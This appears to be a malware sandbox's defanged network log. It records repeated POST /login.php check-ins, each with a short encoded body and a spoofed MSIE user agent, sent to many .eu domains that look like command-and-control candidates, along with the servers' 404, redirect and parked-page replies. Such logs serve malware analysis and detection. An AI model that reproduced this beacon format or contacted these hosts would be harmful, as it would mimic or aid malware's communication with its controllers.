X-Pingback: hXXp://lykil.se/xmlrpc.php

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Content-Length: 7146

Accept-Ranges: bytes

X-Varnish: 2462812272

Age: 0

Via: 1.1 varnish

X-Loopia-Cache: MISS

<!DOCTYPE html>.<html lang="sv-SE" prefix="og: hXXp://ogp.me/ns# fb: hXXp://ogp.me/ns/fb#">.<head>.<meta charset="UTF-8" />.<title>404 Not Found | lykil</title>.<link rel="profile" href="hXXp://gmpg.org/xfn/11" />.<link rel="stylesheet" type="text/css" media="all" href="hXXp://lykil.se/wp-content/themes/page7/style.css" />.<link rel="pingback" href="hXXp://lykil.se/xmlrpc.php" />..<!-- SEO Ultimate (hXXp://VVV.seodesignsolutions.com/wordpress-seo/) -->.<!-- /SEO Ultimate -->..<link rel='stylesheet' id='frm-forms-css' href='hXXp://lykil.se/wp-content/plugins/formidable/css/frm_display.css?ver=1.07.04' type='text/css' media='all' />.<script type='text/javascript' src='hXXp://lykil.se/wp-includes/js/jquery/jquery.js?ver=1.11.1'></script>.<script type='text/javascript' src='hXXp://lykil.se/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>.<link rel="EditURI" type="application/rsd xml" title="RSD" href="hXXp://lykil.se/xmlrpc.php?rsd" />.<link rel="wlwmanifest" type="application/wlwmanifest xml" href="hXXp://lykil.se/wp-includes/wlwmanifest.xml" /> .<meta name="generator" content="WordPress 4.0" />.<script src="http://lykil.se/wp-content/themes/page7/js/superfish-combined.js"></script>.<script src="hXXp://lykil.se/wp-content/themes/page7/js/jquery.cycle.all.min.js"></script>.<script src="hXXp://lykil.se/wp-content/themes/page7/js/script.js"></script>.&l

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gacek.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:31 GMT

Content-Type: text/html

Connection: close

Accept-Ranges: bytes

Vary: Accept-Encoding

Server: Apache/2

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">.<HTML>.<HEAD>.<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">.<meta http-equiv="Content-Language" content="pl">..<style type="text/css">.. body {font-family: arial; background: #ffffff; font-size: 8px color: white;}.. td { font-family: verdana; font-size: 11px;color: black; }.. p { font-family: verdana; font-size: 18px; color: black; text-align: center;}... a:hover {text-decoration: none; color: white}.</style>.<TITLE>.(none).</TITLE>.</HEAD>.<BODY style="bgcolor: #FFFFFF">......<div style="text-align:center;">.<br>.<table width="100%" border="0" cellpadding="0" cellspacing="0" style="align: center">.<tr><td style="width: 100%" align="center">..<table width="574" style="background-image:url(/errordocs/pasek.gif); height: 21px;" border="0" cellpadding="0" cellspacing="0" >...<tr>....<td style="text-align: left">....<div style="margin-left:45px"><b>Error</b></div>....</td>...</tr>...</table>..<table width="574" border="0" cellpadding="1" cellspacing="1" style="background-color: #9c9c9c;text-align:center;">...<tr>....<td style="background-color: #ffffff">.....<br>.....<table style="background-color: #ffffff">......<tr>.......<td align="center" valign="top"><IMG SRC="/errordocs/error.gif" ALT="eroor"></td>.......<td colspan="2" al

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ganed.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 207

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyman.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:00:57 GMT

Server: Apache/1.3.36 (Unix) mod_ssl/2.8.27 OpenSSL/0.9.7a

Connection: close

Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<html>..<head>..<title>The domain name is registered</title>..<meta http-equiv="Content-Type" content="text/html; charset=windows-1250">..<meta name="description" content="FORPSI je Evropsk. housingov. spole.nost. Nab.z. slu.by webhostingu, serverhostingu, registrace dom.nov.ch jmen a www str.nky na serverech Windows/Linux.">..<meta name="keywords" content="forpsi,webhosting,dom.na,dom.ny,hosting,server,serverhosting,housing,serverhousing,adsl,wifi,wi-fi,domain,domains">..<style type="text/css">..<!--..html, body {...margin: 0px;...padding: 0px;...height: 100%;...background-color: #32549c;..}..#container {...height: 100%;...width: 100%;...text-align: center;..}..#box {...width: 520px;...position: relative;...margin: 0 auto;...top: 160px;...border: 4px solid #cccccc;...background-color: #FFFFFF;...background-image: url(img/logo_forpsi.gif);...background-repeat: no-repeat;...background-position: left top;...padding: 20px;...font-family : Verdana, Arial, Helvetica, sans-serif;...font-size: 14px;...color: #38506b;..}..#box2 {...width: 520px;...position: relative;...margin: 0 auto;...top: 160px;...border: 4px solid #cccccc;...background-color: #FFFFFF;...padding: 20px;...font-family : Verdana, Arial, Helvetica, sans-serif;...font-size: 14px;...color: #38506b;..}...#flag {...position: absolute;...left: 95px;...top: 60px;..}...txt {...font-family: Verdana, Arial, Helvetica, sans-serif;...font-size:

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocer.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache

Location: hXXp://VVV.vocer.org/login.php

Vary: Accept-Encoding

Content-Length: 238

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://VVV.vocer.org/login.php">here</a>.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vonak.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 200 OK

Date: Mon, 10 Nov 2014 20:01:19 GMT

Server: Apache/2.2.16 (Debian)

X-Powered-By: PHP/5.3.22-1~dotdeb.0

Vary: Accept-Encoding

Connection: close

Content-Type: text/html

.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" lang="nl" xml:lang="nl">...<head>.. .<title></title>. ... <meta http-equiv="content-type" content="text/html; charset=utf-8" />.. <meta name="keywords" content="" />.. <meta name="description" content="" />.. .<!--.. <meta property="og:title" content="" /> .. <meta property="og:site_name" content="" />.. <meta property="og:description" content="" /> .. <meta property="og:url" content="hXXp://vonak.eu" />.. --> ... <link rel="shortcut icon" href="" type="image/x-icon" />.. ..<style type="text/css">.. html, body {.. margin: 0px;. padding: 0px;. bottom: 0px;. height: 100%;. width: 100%;. border: 0px;. overflow: hidden;.. }.. iframe {.. margin: 0px;. padding: 0px;. bottom: 0px;. height: 100%;. width: 100%;. border: none;.. }... </style>...</head>...<body>.. .<iframe src="http

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ganed.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 207

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocer.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:22 GMT

Server: Apache

Location: hXXp://VVV.vocer.org/login.php

Vary: Accept-Encoding

Content-Length: 238

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://VVV.vocer.org/login.php">here</a>.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: purel.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:33 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 207

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: purex.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:24 GMT

Location: hXXp://corporate.evonik.com/en/

Content-Length: 239

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://corporate.evonik.com/en/">here</a>.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qexer.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:28 GMT

Server: Apache / DataZone

Content-Length: 276

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache / DataZone Server at qexer.eu Port 80</address>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: purac.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 200 OK

Date: Mon, 10 Nov 2014 20:01:15 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 1013

Connection: close

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN">.<html>.<head>.<title>The largest producer of natural lactic acid, derivatives, gluconates, lactides and polylactides</title>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">.<meta name="robots" content="index,follow">.<meta name="description" content="">.<meta name="keywords" content="natural lactic acid, derivatives, gluconates, lactides, polylactides">.<style type="text/css">.frameset { border:0px; margin:0px; padding:0px; } .frame { border:0px; margin:0px; padding:0px; }.</style>.</head>.<frameset rows="100%">.<frame src="hXXp://www.purac.com/" name="bescherm">.<noframes>.<body bgcolor="FFFFFF" link="000099" alink="000099" vlink="000099">.<div align="center">.<br><br>.<font face="Verdana, Arial" size="2">.hXXp://VVV.purac.com/<br><br>.Klik <a href="http://VVV.purac.com/">hier</A> wanneer u niet binnen 5 seconden automatisch wordt doorverbonden met onze website..</font>.</div>.</body>.</noframes>.</frameset> .</html>...

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.dr.dk

Pragma: no-cache

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galor.eu

Content-Length: 9

Pragma: no-cache

Cookie: 3c861760030e5c7267e7fc479cac0c97=90ed9e5183ab72b8b4139ea09817675b

....~7.~'

HTTP/1.0 404 Artyku..u nie znaleziono

Cache-Control: no-cache

Connection: close

Content-Type: text/html

Date: Mon, 10 Nov 2014 20:01:02 GMT

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Pragma: no-cache

Server: IdeaWebServer/v0.80

<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="pl-pl" lang="pl-pl" dir="ltr">.<head>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<title>B....d: 404 Artyku..u nie znaleziono</title>..<meta name="viewport" content="width=device-width, initial-scale=1.0">....<link href='//fonts.googleapis.com/css?family=Open Sans' rel='stylesheet' type='text/css' />...<style type="text/css">....h1,h2,h3,h4,h5,h6,.site-title{.....font-family: 'Open Sans', sans-serif;....}...</style>...<link rel="stylesheet" href="/templates/protostar/css/template.css" type="text/css" />.....<link href="/templates/protostar/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />...<style type="text/css">...body.site...{....border-top: 3px solid #0088cc;....background-color: #ffffff..}...a...{....color: #0088cc;...}....navbar-inner, .nav-list > .active > a, .nav-list > .active > a:hover, .dropdown-menu li > a:hover, .dropdown-menu .active > a, .dropdown-menu .active > a:hover, .nav-pills > .active > a, .nav-pills > .active > a:hover...{....background: #0088cc;...}....navbar-inner...{....-moz-box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);....-webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);....box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galor.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.0 404 Artyku..u nie znaleziono

Cache-Control: no-cache

Connection: close

Content-Type: text/html

Date: Mon, 10 Nov 2014 20:01:00 GMT

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Pragma: no-cache

Server: IdeaWebServer/v0.80

Set-Cookie: 3c861760030e5c7267e7fc479cac0c97=90ed9e5183ab72b8b4139ea09817675b; path=/; HttpOnly

<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="pl-pl" lang="pl-pl" dir="ltr">.<head>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<title>B....d: 404 Artyku..u nie znaleziono</title>..<meta name="viewport" content="width=device-width, initial-scale=1.0">....<link href='//fonts.googleapis.com/css?family=Open Sans' rel='stylesheet' type='text/css' />...<style type="text/css">....h1,h2,h3,h4,h5,h6,.site-title{.....font-family: 'Open Sans', sans-serif;....}...</style>...<link rel="stylesheet" href="/templates/protostar/css/template.css" type="text/css" />.....<link href="/templates/protostar/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />...<style type="text/css">...body.site...{....border-top: 3px solid #0088cc;....background-color: #ffffff..}...a...{....color: #0088cc;...}....navbar-inner, .nav-list > .active > a, .nav-list > .active > a:hover, .dropdown-menu li > a:hover, .dropdown-menu .active > a, .dropdown-menu .active > a:hover, .nav-pills > .active > a, .nav-pills > .active > a:hover...{....background: #0088cc;...}....navbar-inner...{....-moz-box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);....-webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);....box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocab.eu

Content-Length: 9

Pragma: no-cache

Cookie: PHPSESSID=envpqbkkkiv4cm5eun0u8hgar1

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:02:36 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.4-14 deb7u8

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache

<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>vocab.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>nine hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">vocab.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://vocab.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="http://vocab.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="hXXp://vocab.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://vocab.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />

<<< skipped >>>

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.gater.eu

Pragma: no-cache

HTTP/1.1 404 OK

Content-Length: 1635

Content-Type: text/html

Server: Microsoft-IIS/6.0

X-Powered-By: PHP/5.2.0

X-Powered-By: ASP.NET

Date: Mon, 10 Nov 2014 20:01:30 GMT

Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>The page cannot be found</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">..<STYLE type="text/css">.. BODY { font: 8pt/12pt verdana }.. H1 { font: 13pt/15pt verdana }.. H2 { font: 8pt/12pt verdana }.. A:link { color: red }.. A:visited { color: maroon }..</STYLE>..</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>..<h1>The page cannot be found</h1>..The page you are looking for might have been removed, had its name changed, or is temporarily unavailable...<hr>..<p>Please try the following:</p>..<ul>..<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>..<li>If you reached this page by clicking a link, contact.. the Web site administrator to alert them that the link is incorrectly formatted...</li>..<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>..</ul>..<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>..<hr>..<p>Technical Information (for support personnel)</p>..<ul>..<li>Go to <a href="hXXp://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> a

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: volez.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache/2.2.16 (Debian)

Vary: Accept-Encoding

Content-Length: 281

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.16 (Debian) Server at volez.eu Port 80</address>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gadak.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:33 GMT

Server: Apache

Content-Length: 326

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.gater.eu

Pragma: no-cache

HTTP/1.1 404 OK

Content-Length: 1635

Content-Type: text/html

Server: Microsoft-IIS/6.0

X-Powered-By: PHP/5.2.0

X-Powered-By: ASP.NET

Date: Mon, 10 Nov 2014 20:01:31 GMT

Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>The page cannot be found</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">..<STYLE type="text/css">.. BODY { font: 8pt/12pt verdana }.. H1 { font: 13pt/15pt verdana }.. H2 { font: 8pt/12pt verdana }.. A:link { color: red }.. A:visited { color: maroon }..</STYLE>..</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>..<h1>The page cannot be found</h1>..The page you are looking for might have been removed, had its name changed, or is temporarily unavailable...<hr>..<p>Please try the following:</p>..<ul>..<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>..<li>If you reached this page by clicking a link, contact.. the Web site administrator to alert them that the link is incorrectly formatted...</li>..<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>..</ul>..<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>..<hr>..<p>Technical Information (for support personnel)</p>..<ul>..<li>Go to <a href="hXXp://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> a

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gatun.eu

Content-Length: 9

Pragma: no-cache

Cookie: 22afb07fb7b37e411b809b5a50bb58a4=e3d67bf7a2853f95840a6b5a8f632b61

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx/1.2.4

Date: Mon, 10 Nov 2014 20:01:01 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.3.13

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Status: 404 Article not found

Cache-Control: no-cache

Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr">..<head>...<title>404 - Error: 404</title>...<link rel="stylesheet" href="/templates/gatun_jslab/css/style.css" type="text/css" />..</head>..<body>..<div class="box404"><img src="/templates/gatun_jslab/images/404.png" alt="" /></div>.. <!--...<div class="error">....<div id="outline">....<div id="errorboxoutline">.....<div id="errorboxheader">404 - Article not found</div>.....<div id="errorboxbody">.....<p><strong>You may not be able to visit this page because of:</strong></p>......<ol>.......<li>an <strong>out-of-date bookmark/favourite</strong></li>.......<li>a search engine that has an <strong>out-of-date listing for this site</strong></li>.......<li>a <strong>mistyped address</strong></li>.......<li>you have <strong>no access</strong> to this page</li>.......<li>The requested resource was not found.</li>.......<li>An error has occurred while processing your request.</li>......</ol>.....<p><strong>Please try one of the following pages:</strong></p>......<ul>.......<li><a href="/index.php" title="Go to the Home P

<<< skipped >>>

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.vocer.org

Pragma: no-cache

HTTP/1.0 404 Not Found

Date: Mon, 10 Nov 2014 20:01:22 GMT

Server: Apache

X-Powered-By: PHP/5.4.34-nmm1

X-Pingback: hXXp://VVV.vocer.org/xmlrpc.php

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Vary: Accept-Encoding

Connection: close

Content-Type: text/html; charset=UTF-8

